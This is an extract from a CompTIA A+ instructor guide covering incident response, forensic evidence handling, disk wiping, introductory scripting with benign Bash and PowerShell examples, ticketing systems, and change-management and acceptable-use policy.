LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
666 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Open-source Licenses
Software released under an open-source license generally makes it free to use,
modify, and share and makes the program code used to design it available. The
idea is that other programmers can investigate the program and make it more
stable and useful. An open-source license does not forbid commercial use of
applications derived from the original, but it is likely to impose the same conditions
on further redistributions. When using open-source software, it is important to
verify the specific terms of the license as they can vary quite widely.
Commercial open-source software may be governed by additional subscription or
enterprise agreements to supplement the open-source software license.
Incident Response
Show While performing technical support, you may have to report or respond to security
Slide(s) incidents. A security incident could be one of a wide range of different scenarios,
Incident Response such as:
• A computer or network infected with viruses, worms, or Trojans.
Teaching
Tip • A data breach or data exfiltration where information is seen or copied to another
Discuss the incident system or network without authorization.
response process
and notification/ • An attempt to break into a computer system or network through phishing or an
escalation routes plus evil twin Wi-Fi access point.
the requirements for
gathering forensically • An attempt to damage a network through a denial of service (DoS) attack.
sound digital evidence.
• Users with unlicensed software installed to their PC.
An incident response plan (IRP) sets out procedures and guidelines for dealing
with security incidents. Larger organizations will provide a dedicated Computer
Security Incident Response Team (CSIRT) as a single point-of-contact so that a
security incident can be reported through the proper channels. The members of
this team should be able to provide the range of decision-making and technical
skills required to deal with different types of incidents. The team needs managers
and technicians who can deal with minor incidents on their own initiative. It also
needs senior decision-makers (up to director level) who can authorize actions
following the most serious incidents.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 667
One exception may be where you act as a whistleblower because you have proof that
senior staff in the organization pose an insider threat or are disregarding regulations or
legislation.
2. Document the scene of the incident using photographs and ideally video
and audio. Investigators must record every action they take in identifying,
collecting, and handling evidence.
3. If possible, gather any available evidence from a system that is still powered
on, using live forensic tools to capture the contents of cache, system memory,
and the file system. If live forensic tools are not available, it might be
appropriate to video record evidence from the screen.
4. If appropriate, disable encryption or a screen lock and then power off each
device.
5. Use a forensic tool to make image copies of fixed disk(s) and any removable
disks. A forensic imaging tool uses a write blocker to ensure that no changes
occur to the source disk during the imaging process.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
668 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
6. Make a cryptographic hash of each source disk and its forensic image. This
can be used to prove that the digital evidence collected has not been modified
subsequent to its collection.
Verifying a source disk with an image made using AccessData FTK® Imager.
(Screenshot used with permission from Exterro, Inc.)
Chain of Custody
It is vital that the evidence collected at the crime scene conforms to a valid timeline.
Digital information is susceptible to tampering, so access to the evidence must be
tightly controlled. Once evidence has been bagged, it must not subsequently be
handled or inspected, except in controlled circumstances.
A chain of custody form records where, when, and who collected the evidence,
who has handled it subsequently, and where it was stored. The chain of custody
must show access to, plus storage and transportation of, the evidence at every
point from the crime scene to the court room. Everyone who handles the evidence
must sign the chain of custody and indicate what they were doing with it.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 669
Erasing/Wiping
Disk erasing/wiping software ensures that old data is destroyed by writing to each
location on a hard disk drive, either using zeroes or in a random pattern. This leaves
the disk in a “clean” state ready to be passed to the new owner. This overwriting
method is suitable for all but the most confidential data, but it is time-consuming
and requires special software. Also, it does not work reliably with SSDs.
If the device firmware does not support encryption, using a software disk-encryption
product and then destroying the key and using SE should be sufficient for most
confidentiality requirements.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
670 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 671
Review Activity:
Data Handling Best Practices
6
No. The license is likely to permit installation to only one computer at a time. It
might or might not prohibit commercial use, but regardless of the license terms,
any installation of software must be managed by the IT department.
Digital evidence is difficult to capture in a form that demonstrates that it has not
been tampered with. Documentation of the scene and proper procedures are
crucial.
Who has had access to evidence collected from a crime scene and where and how it
has been stored.
Using standard formatting tools will leave data remnants that could be recovered in
some circumstances. This might not be considered high risk, but it would be safer
to use a vendor low-level format tool with support for Secure Erase or Crypto Erase.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
672 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 19D
Identify Basics of Scripting
6
Teaching • A general-purpose scripting language uses statements and modules that are
Tip independent of the operating system. This type of script is executed by an
Use Linux shell interpreter. The interpreter implements the language for a particular OS.
scripts as a general
introduction to the • A programming language is used to compile an executable file that can be
subject. Explain that installed to an OS and run as an app.
basic shell scripts or
batch files simply use
The various types of scripting are often described as glue languages. Rather than
commands from the
implement an independent bit of software (as a programming language would), a glue
underlying operating
system. language is used to automate and orchestrate functions of multiple different OS and
app software.
You can develop a script in any basic text editor, but using an editor with script
support is more productive. Script support means the editor can parse the syntax
of the script and highlight elements of it appropriately. For complex scripts and
programming languages, you might use an integrated development environment
(IDE). This will provide autocomplete features to help you write and edit code
and debugging tools to help identify whether the script or program is executing
correctly.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 673
A Linux shell script uses the .SH extension by convention. Every shell script starts
with a shebang line that designates which interpreter to use, such as Bash or Ksh.
Each statement comprising the actions that the script will perform is then typically
added on separate lines. For example, the following script instructs the OS to
execute in the Bash interpreter and uses the echo command to write “Hello World”
to the terminal:
#!/bin/bash
echo ‘Hello World’
Remember that in Linux, the script file must have the execute permission set to
run. Execute can be set as a permission for the user, group, or world (everyone). If
a PATH variable to the script has not been configured, execute it from the working
directory by preceding the filename with ./ (for example, ./hello.sh), or use
the full path.
Setting execute permission for the user and running the script.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
674 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Variables
A variable is a label for some value that can change as the script executes. For
example, you might assign the variable FirstName to a stored value that
contains a user’s first name. Variables are usually declared, defined as a particular
data type (such as text string or number), and given an initial value at the start of
the routine in which they are used.
An argument or parameter is a variable that is passed to the script when it is
executed. In Bash, the values $1, $2, and so on are used to refer to arguments
by position (the order in which they are entered when executing the script). Other
languages support passing named arguments.
Branches
A branch is an instruction to execute a different sequence of instructions based on
the outcome of some logical test. For example, the following code will display “Hello
Bobby” if run as ./hello.sh Bobby, executing the statement under “else”. If
run with no argument, it prints “Hello World”:
#!/bin/bash
# Demonstrate If syntax in Bash
if [ -z “$1” ]
then
echo ‘Hello World’
else
echo “Hello $1”
fi
-z tests whether the first positional parameter ($1) is unset or empty.
In the condition, the variable is enclosed in double quotes as this is a safer way to treat
the input from the user (supplied as the argument). In the second echo statement,
double quotes are used because this allows the variable to expand to whatever it
represents. Using single quotes would print “Hello $1” to the terminal.
Loops
A loop allows a statement block to be repeated based on some type of condition. A
“For” loop can be used when the number of iterations is predictable. The following
command executes the ping command for each host address in 192.168.1.0/24:
#!/bin/bash
# Demonstrate For syntax in Bash
for i in {1..254}
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 675
do
ping -c1 “192.168.1.$i”
done
As well as “For” structures, loops can also be implemented by “While” statements.
A “While” or “Until” loop repeats an indeterminate number of times until a logical
condition is met. The following script pings the address supplied as an argument
until a reply is received:
#!/bin/bash
# Demonstrate Until syntax in Bash
until ping -c1 “$1” &>/dev/null
do
echo “192.168.1.$1 not up”
done
echo “192.168.1.$1 up”
The condition executes the ping command and tests the result. When a reply is
received, ping returns true. The &>/dev/null part stops the usual ping output
from being written to the terminal by redirecting it to a null device.
Make sure your code does not contain unintended or infinite loops. The loop above will
continue until a reply is received, which could never happen.
Operators
Looping and branching structures depend on logical tests to determine which
branch to follow or whether to continue the loop. A logical test is one that resolves
to a TRUE or FALSE value. You need to be familiar with basic comparison and logical
operators:
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
676 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Windows Scripts
Show Windows supports several distinct shell coding environments. The three commonly
Slide(s) used are PowerShell, Visual Basic Script, and the CMD interpreter.
Windows Scripts
Windows PowerShell
Teaching
Tip Windows PowerShell (PS) combines a script language with hundreds of prebuilt
modules called cmdlets that can access and change most components and features
Discuss the three main
Windows scripting
of Windows and Active Directory. Cmdlets use a Verb-Noun naming convention.
shells. For example, Write-Host sends output to the terminal, while Read-Host
prompts for user input.
Microsoft provides the Windows PowerShell Integrated Scripting Environment (ISE)
for rapid development. PowerShell script files are identified by the .PS1 extension.
VBScript
VBScript is a scripting language based on Microsoft’s Visual Basic programming
language. VBScript predates PowerShell. VBScript files are identified by the .VBS
extension. VBScript is executed by the wscript.exe interpreter by default. Wscript.
exe displays any output from the script in a desktop window or dialog. A script can
also be run with cscript.exe to show output in a command prompt.
You would now normally use PowerShell for Windows automation tasks. You might
need to support legacy VBScripts, though.
Batch Files
A shell script written for the basic Windows CMD interpreter is often described as a
batch file. Batch files use the .BAT extension.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 677
JavaScript Teaching
Tip
JavaScript is a scripting language that is designed to implement interactive web-
based content and web apps. Most web servers and browsers are configured with a Explain that these
are general-
JavaScript interpreter. This means that JavaScript can be executed automatically by purpose scripting/
placing it in the HTML code for a web page. programming
languages. JavaScript
If not embedded within another file, J avaScript script files are identified by the
is mostly associated
.JS extension. The Windows Script Host (wscript.exe and cscript.exe) supports with building web/
JavaScript. JavaScript is also supported on macOS for automation (along with mobile apps, while
AppleScript). This is referred to as JavaScript for Automation (JXA). Python can be used
for pretty much any
programming task.
JavaScript code embedded in a web page. Some code is loaded from .JS files from other servers;
some code is placed within script tags. (Screenshot courtesy of Mozilla.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
678 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Python
Python is a general-purpose scripting and programming language that can be used
to develop both automation scripts and software apps. A Python project can either
be run via an interpreter or compiled as a binary executable. There are several
interpreters, including CPython (python.org) and PyPy (pypy.org). CPython is the
simplest environment to set up for Windows.
Python script files are identified by the .PY extension. When using CPython in
Windows, there is a console interpreter (python.exe) and a windowed interpreter
(pythonw.exe). The extension .PYW is associated with pythonw.exe.
Show There are two major versions of Python: version 2 and version 3. It is possible for both
Slide(s) to be installed at the same time. In Linux, using the keyword python executes a
Use Cases for Scripting script as version 2, while python3 executes a script in the version 3 interpreter. As
of 2020, Python 2 is end of life (EOL), so scripts should really be updated to version 3
Teaching syntax.
Tip
Use the list to make
students aware of the
Use Cases for Scripting
sort of automation One of the primary use cases for scripting is basic automation. Automation means
tasks that can be
accomplished through
performing some series of tasks that are supported by an OS or by an app via a
scripting. Discuss how script rather than manually. When using a local script environment, such as Bash
a scripting language on Linux or PowerShell on Windows, the script can use the built-in command
can achieve this: either environment.
by using commands in
the OS or by using the When using a general-purpose language, such as Python, the script must use the
OS’s API (and in the operating system’s application programming interface (API) to “call” functions.
latter case via a pre- These API calls must be implemented as modules. Python has many prebuilt
built module/library modules for automating Windows, Linux, and macOS. For example, the os module
or through direct API
implements file system, user/permission functions, and process manipulation
calls).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 679
for whatever environment the interpreter is installed to. You can also use the
interpreter in a more specific context. For example, mod_python implements a
Python interpreter for the Apache web server software.
Another option is to call one script from another. For example, if you have some task
that involves both Linux and Windows PCs, you might create a Python script to manage
the task but execute Bash and PowerShell scripts from the Python script to implement
the task on the different machines.
Restarting Machines
In an ideal world, no OS would ever need restarting. While Windows has made
some improvements in this respect, many types of installation or update still
require a reboot. In PowerShell, you can use the Restart-Computer cmdlet.
The -Force parameter can be used to ignore any warnings that might be
generated.
Linux is famous for its ability to run for any period without requiring a restart.
However, should the need arise, the command to restart the host in Bash is
shutdown -r
Remapping Network Drives
In a Windows batch file, the net use command performs drive mapping. The
same thing can be done with PowerShell using the New-PSDrive cmdlet. This
type of script demonstrates the need for error handling. If you try to map a drive
using a letter that has been assigned already, the script will return an error. You can
anticipate this by using an If condition to remove an existing mapping, if present:
If (Test-Path L:) {
Get-PSdrive L | Remove-PSDrive
}
New-PSDrive -Name “L” -Persist -PSProvider
FileSystem -Root “\\MS10\LABFILES”
Error handling is an important part of developing robust scripts.
Network drive mapping is a Windows-only concept. In Linux, a file system is made
available by mounting it within the root file system, using the mount and umount
commands.
Installation of Applications
In Windows, a setup file can be executed in silent mode by using the command
switches for its installer. Installers are typically implemented either as .EXE files or
as Windows Installer (.MSI) packages. To use an EXE setup in a batch file, just add
the path to the installer plus switches:
C:\David\Downloads\setup.exe /S /desktopicon=yes
To use a Windows Installer, add the msiexec command:
msiexec C:\David\Downloads\install.msi /qn
You can also run these commands directly in a PowerShell script. However, the
Start-Process cmdlet gives you more options for controlling the installation
and handling errors.
In Linux, scripts are often used to compile apps from source code. You could also
use a script to automate APT or YUM package management.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
680 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Initiating Updates
In Windows, the wusa.exe process can be called from a batch file to perform
typical update tasks. In PowerShell, the PSWindowsUpdate module contains
numerous cmdlets for managing the update process. Most third-party applications
should support update-checking via an API.
In Linux, you can call apt-get/apt or yum from your Bash script. The -y option
can be used to suppress confirmation messages.
Automated Backups
At the command prompt, a simple type of backup can be performed by using the
ordinary file-copy tools, such as robocopy in Windows, or the script could call
functions of a proper backup utility. The script can be set to run automatically by
using Windows Task Scheduler or via cron in Linux.
Gathering of Information/Data
In Windows PowerShell, there are hundreds of Get verb cmdlets that will return
configuration and state data from a Windows subsystem. For example, Get-
NetAdapter returns properties of network adapters and Get-WinEvent
returns log data. You can pipe the results to the Where-Object and Select-
Object cmdlets to apply filters.
Bash supports numerous commands to manipulate text. You can gather data from
the output of a command such as ps or df, filter it using grep, format it using
tools like awk or cut, and then redirect the output to a file.
printf “Processes run by $1 on $(date +%F) at
$(date +%T) \n” >> “ps-$1.log”
ps -ef | grep “$1” | cut “$((${#1}+9))-” >> “ps-
$1.log”
This script reports processes by the username supplied as an argument to a log
file, using the argument variable to name the file. The printf command appends
a header with the date, time, and username. The second line filters ps output by
the username, uses the length of the argument variable plus nine to cut characters
from each line, and appends the output to the same log file.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 681
To mitigate these risks, all script source code should be subject to access and
version controls to prevent unauthorized changes. Code should be scanned and
tested for vulnerabilities and errors before it can be deployed. Scripts should be
configured to run with the minimum privileges necessary for the task.
• Using a faulty loop code construct that does not terminate and causes the script
to hang.
• Making a faulty API call to some other process, such as the host browser, that
causes it to crash.
Every script must be tested to try to eliminate these kinds of mistakes before it is
deployed, and its execution should be monitored to pick up any bugs that were not
found in the test phase.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
682 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Basics of Scripting
7
Teaching 1. You are auditing a file system for the presence of any unauthorized
Tip Windows shell script files. Which three extensions should you scan for?
Take some time at .PS1 for PowerShell scripts, .VBS for VBScript, and .BAT for cmd batch files.
the end of each topic
to answer questions. 2. You want to execute a block of statements based on the contents of an
You can use the
inventory list. What type of code construct is best suited to this task?
review questions
for discussion in
You can use any type of loop to iterate through the items in a list or collection, but a
class or set them for
students to complete For loop is probably the simplest.
individually during or
after class. 3. You are developing a Bash script to test whether a given host is up. Users
will run the script in the following format:
./ping.sh 192.168.1.1
Within the code, what identifier can you use to refer to the IP address
passed to the script as an argument?
Use a conditional block (If statement) to check for an existing mapping, and remove
it before applying the correct mapping.
5. You are developing a script to scan server hosts to discover which ports
are open and to identify which server software is operating the port.
What considerations should you make before deploying this script?
While the risk is low, scanning activity could cause problems with the target and
possibly even crash it. Test the script in a sandbox environment before deploying
it. Security software might block the operation of this script, and there is some risk
from the script or its output being misused. Make sure that use of the script and
its output are subject to access controls and that any system reconfiguration is
properly change-managed.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 683
Lesson 19
Summary
6
You should be able to use remote access, backup/recovery, data destruction, Show
and scripting tools and methods to provide operational support and explain Slide(s)
the importance of prohibited content/activity and privacy, licensing, and policy Summary
concepts.
Teaching
Guidelines for Using Support and Scripting Tools Tip
Try to include some
Follow these guidelines to use support and scripting tools: time at the end
• Use a desktop management or RMM suite or individual remote access tools of each lesson to
check students'
(RDP/MSRA, VNC, SSH, VPN, screen-sharing software, video-conferencing understanding and
software, and file transfer software) to implement secure remote-support answer questions.
procedures.
• Configure and regularly test 3-2-1 rule backup and media rotation methods (full,
incremental, differential, synthetic, GFS, and on site versus off site) to ensure
secure recovery from disasters.
• Consider using common script types (.BAT, .PS1, .VBS, .SH, .JS, and .PY) to
implement basic automation (restarting machines, remapping network drives,
installation of applications, automated backups, gathering of information/data,
and initiating updates), taking account of security considerations (unintentionally
introducing malware, inadvertently changing system settings, and browser or
system crashes due to mishandling of resources).
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 20
Implementing Operational
1
Procedures
LESSON INTRODUCTION
In the previous lesson, we considered processes for providing remote support, Show
data handling and backup, incident response, and automation through scripting. Slide(s)
Companies also need ticketing systems, asset documentation, and change- Objectives
management procedures to enforce configuration management. They need safe
working practices and to ensure the physical environment does not present any Teaching
health hazards or risks to electronic devices. Additionally, they need to ensure Tip
that technicians and agents represent the company professionally in all customer This lesson completes
contact and support situations. This lesson will help you to identify the best the coverage
practices that underpin these important operational procedures. of operational
procedures (and
the Core 2 course).
Lesson Objectives It concentrates
on documented
In this lesson, you will: procedures and
systems for ticket/
• Implement best practice documentation. change management,
customer support,
• Use proper communication techniques. and safety and
environmental
• Use common safety and environmental procedures. controls.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
686 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 20A
Show
Slide(s)
Implement Best Practice
Implement
Best Practice
Documentation
Documentation 2
Teaching
• A policy is an overall statement of intent.
Tip • A standard operating procedure (SOP) is a step-by-step list of the actions that
Discuss how SOPs help must be completed for any given task to comply with policy. Most IT procedures
to ensure consistency should be governed by SOPs.
and security.
• Guidelines are for areas of policy where there are no procedures, either because
the situation has not been fully assessed or because the decision-making
process is too complex and subject to variables to be able to capture it in a SOP.
Guidelines may also describe circumstances where it is appropriate to deviate
from a specified procedure.
• New-user setup checklist as part of the onboarding process for new employees
and employees changing job roles. Typical tasks include identification/
enrollment with secure credentials, allocation of devices, and allocation of
permissions/assignment to security groups.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 687
Ticketing Systems
A ticketing system manages requests, incidents, and problems. Ticketing systems Show
can be used to support both internal end-users and external customers. Slide(s)
The general process of ticket management is as follows: Ticketing Systems
1. A user contacts the help desk, perhaps by phone or email or directly via the Teaching
ticketing system. A unique job ticket ID is generated, and an agent is assigned Tip
to the ticket. The ticket will also need to capture some basic details: Describe the core
fields and the
• User information—The user’s name, contact details, and other relevant function they serve in
information such as department or job role. It might be possible to link the recording, prioritizing,
ticket to an employee database or customer relationship management (CRM) and progressing
database. support cases.
2. The user supplies a description of the issue. The agent might ask clarifying
questions to ensure an accurate initial description.
3. The agent categorizes the support case, assesses how urgent it is, and
determines how long it will take to fix.
4. The agent may take the user through initial troubleshooting steps. If these
do not work, the ticket may be escalated to deskside support or a senior
technician.
Categories
Categories and subcategories group related tickets together. This is useful for
assigning tickets to the relevant support section or technician and for reporting and
analysis.
Service management standards distinguish between the following basic ticket types:
• Requests are for provisioning things that the IT department has a SOP for,
such as setting up new user accounts, purchasing new hardware or software,
deploying a web server, and so on. Complex requests that aren’t covered by
existing procedures are better treated as projects rather than handled via the
ticketing system.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
688 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Problems are causes of incidents and will probably require analysis and service
reconfiguration to solve. This type of ticket is likely to be generated internally
when the help desk starts to receive many incidents of the same type.
Using these types as top-level categories for an end-user facing system is not always
practical, however. End-users are not likely to know how to distinguish incidents
from problems, for example. Devising categories that are narrow enough to be
useful but not so numerous as to be confusing or to slow down the whole ticketing
process is a challenging task.
One strategy is for a few simple, top-level categories that end-users can self-select,
such as New Device Request, New App Request, Employee Onboarding, Employee
Offboarding, Help/Support, and Security Incident. Then, when assigned to the ticket,
the support technician can select from a longer list of additional categories and
subcategories to help group related tickets for reporting and analysis purposes.
Alternatively, or to supplement categories, the system might support adding
standard keyword tags to each ticket. A keyword system is more flexible but does
depend on each technician tagging the ticket appropriately.
Severity
A severity level is a way of classifying tickets into a priority order. As with categories,
these should not be overcomplex. For example, three severity levels based on
impact might be considered sufficient:
• Critical incidents have a widespread effect on customers or involve potential or
actual data breach.
More discrete levels may be required if the system must prioritize hundreds
or thousands of minor incidents per week. A more sophisticated system that
measures both impact and urgency might be required. Severity levels can also drive
a notification system to make senior technicians and managers immediately aware
Show of major and critical incidents as they arise.
Slide(s)
Ticket Management Ticket Management
Teaching After opening an incident or problem ticket, the troubleshooting process is applied
Tip until the issue is resolved. At each stage, the system must track the ownership of
Discuss how a the ticket (who is dealing with it) and its status (what has been done).
ticketing system
supports effective
This process requires clear written communication and might involve tracking
teamwork only if through different escalation routes.
fields are completed
clearly and concisely. Escalation Levels
Escalation is covered
in Core 1 as part of Escalation occurs when an agent cannot resolve the ticket. Some of the many
the troubleshooting reasons for escalation include:
model, but remind
students of the • The incident is related to a problem and requires analysis by senior technicians
main routes (senior or by a third-party/warranty support service.
staff, management,
vendors, sales/conflict • The incident severity needs to be escalated from minor to major or major to
resolution) here. critical and now needs the involvement of senior decision-makers.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 689
• The incident needs the involvement of sales or marketing to deal with service
complaints or refund requests.
The support team can be organized into tiers to clarify escalation levels. For
example:
• Tier 0 presents self-service options for the customer to try to resolve an incident
via advice from a knowledge base or “help bot.”
• Tier 1 connects the customer to an agent for initial diagnosis and possible
incident resolution.
• Tier 2 allows the agent to escalate the ticket to senior technicians (Tier 2 –
Internal) or to a third-party support group (Tier 2 – External).
The ticket owner is the person responsible for managing the ticket. When
escalating, ownership might be re-assigned or not. Whatever system is used, it
is critical to identify the current owner. The owner must ensure that the ticket is
progressed to meet any deadlines and that the ticket requester is kept informed
of status.
• Progress notes record what diagnostic tools and processes have discovered and
the identification and confirmation of a probable cause.
• Problem resolution sets out the plan of action and documents the successful
implementation and testing of that plan and full system functionality. It should
also record end-user or customer acceptance that the ticket can be closed.
At any point in the ticket life cycle, other agents, technicians, or managers may
need to decide something or continue a troubleshooting process using just
the information in the ticket. Tickets are likely to be reviewed and analyzed. It
is also possible that tickets will be forwarded to customers as a record of the
jobs performed. Consequently, it is important to use clear and concise written
communication to complete description and progress fields, with due regard for
spelling, grammar, and style.
• Clear means using plain language rather than jargon.
• Concise means using as few words as possible in short sentences. State the
minimum of fact and action required to describe the issue or process.
Incident Reports
For critical and major incidents, it may be appropriate to develop a more in-depth
incident report, also referred to as an after-action report (AAR) or as lessons
learned. An incident report solicits the opinions of users/customers, technicians,
managers, and stakeholders with some business or ownership interest in the
problem being investigated. The purpose of an incident report is to identify
underlying causes and recommend remediation steps or preventive measures to
mitigate the risk of a repeat of the issue.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
690 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 691
Schematics can either be drawn manually by using a tool such as Microsoft Visio or
compiled automatically from network mapping software.
Asset Documentation
An asset procurement life cycle identifies discrete stages in the use of hardware and Show
software: Slide(s)
• Change procedures approve a request for a new or upgraded asset, taking Asset Documentation
account of impacts to business, operation, network, and existing devices.
• Maintenance implements a procedure for monitoring and supporting the use of the
asset.
• Disposal implements a procedure for sanitizing any data remnants that might be
stored on the asset before reusing, selling, donating, recycling, or destroying the
asset.
Assigned Users
Hardware assets such as workstations, laptops, smartphones, tablets, and software
licenses might be assigned to individual user accounts. Alternatively, assets
might be allocated to security groups representing business departments or job
roles. Shared-use assets, such as servers, routers, switches, and access points,
might be allocated to individual technicians or security groups for management
responsibility. This is better practice than sharing default administrator accounts.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
692 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Change Requests
A change request is generated when a fault needs to be fixed, new business needs
or processes are identified, or there is room for improvement in an existing SOP
or system. The need to change is often described either as reactive, where the
change is forced on the organization, or as proactive, where the need for change is
anticipated and initiated internally.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 693
In a formal change-management process, the need or reasons for change and the
procedure for implementing the change are captured in a request-for-change (RFC)
form and submitted for approval. Change-request documentation should include:
• Purpose of the change—This is the business case for making the change and
the benefits that will accrue. It might include an analysis of risks associated with
performing the change and risks that might be incurred through not performing
the requested change.
Change Approval
When a change request has been drafted and submitted, it must go through an Show
approval process. Slide(s)
Change Approval
Change Board Approvals
If the change is normal or minor, approval might be granted by a supervisor or
department manager. Major changes are more likely to be managed as a dedicated
project and require approval through a Change Advisory Board (CAB). The role of
the CAB is to assess both the business case and the technical merits and risks of
the change plan. The CAB should include stakeholders for departments, users,
or customers who will be impacted by the change as well as those proposing it,
technicians who will be responsible for implementing it, and managers/directors
who can authorize the budget.
Risk Analysis
For the CAB to approve a change, it must be confident that risk analysis has identified
both things that could go wrong and positive enhancements (or mitigation of negative
effects) that will be made from completing the change. Risk analysis is a complex and
demanding skill, but in simple terms it involves two types of approach:
• Quantitative risk analysis calculates discrete values for the impact and likelihood
of each factor affecting the change proposal.
• Qualitative risk analysis seeks to identify and evaluate impact and likelihood
factors through previous experience and informed opinion to replace or
supplement metrics.
The outcome of risk analysis is the assignment of some risk level to the change
request. This could be expressed as a discrete value or as a traffic light–type of
indicator, where red is high risk, orange is moderate risk, and green is minimal
risk. If the change is approved despite a high level of risk, stakeholders must be
informed of these risks so that they can anticipate and react to them appropriately
as the change implementation project proceeds.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
694 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
End-user Acceptance
As well as the technical implementation, the change plan must account for end-user
acceptance. It can be difficult for people to adapt to new processes and easy for
them to magnify minor problems into major complaints of the “It worked before”
kind. There are three principal strategies for mitigating these risks:
• Change requests should be considered by stakeholders on the change board
who represent end-user and/or customer interests.
Policy Documentation
Show An acceptable use policy (AUP) sets out what someone is allowed to use a
Slide(s) particular service or resource for. Such a policy might be used in different contexts.
Policy Documentation
For example, an AUP could be enforced by a business to govern how employees use
equipment and services such as telephone or Internet access provided to them at
work. Another example might be an ISP enforcing a fair use policy governing usage
of its Internet access services.
Enforcing an AUP is important to protect the organization from the security and
legal implications of employees (or customers) misusing its equipment. Typically,
the policy will forbid the use of equipment to defraud, defame, or to obtain illegal
material. It is also likely to prohibit the installation of unauthorized hardware
or software and to explicitly forbid actual or attempted intrusion (snooping). An
organization’s acceptable use policy may forbid use of Internet tools outside of
work-related duties or restrict such use to break times.
Further to AUPs, it may be necessary to implement regulatory compliance
requirements as logical controls or notices. For example, a splash screen might be
configured to show at login to remind users of data handling requirements or other
regulated use of a workstation or network app.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 695
Review Activity:
Best Practice Documentation
3
• Escalation levels
This list contains no means of recording the severity of the ticket. This field is
important for prioritizing issues.
You can create diagrams to show the physical topology or the logical topology. The
physical topology shows how nodes are connected by cabling. The logical topology
shows IP addresses and subnets/VLANs. There are lots of other types of network
topology diagrams, of course, but physical and logical are the two basic distinctions
you can make. It is best practice not to try to create a diagram that shows both as
this is likely to reduce clarity.
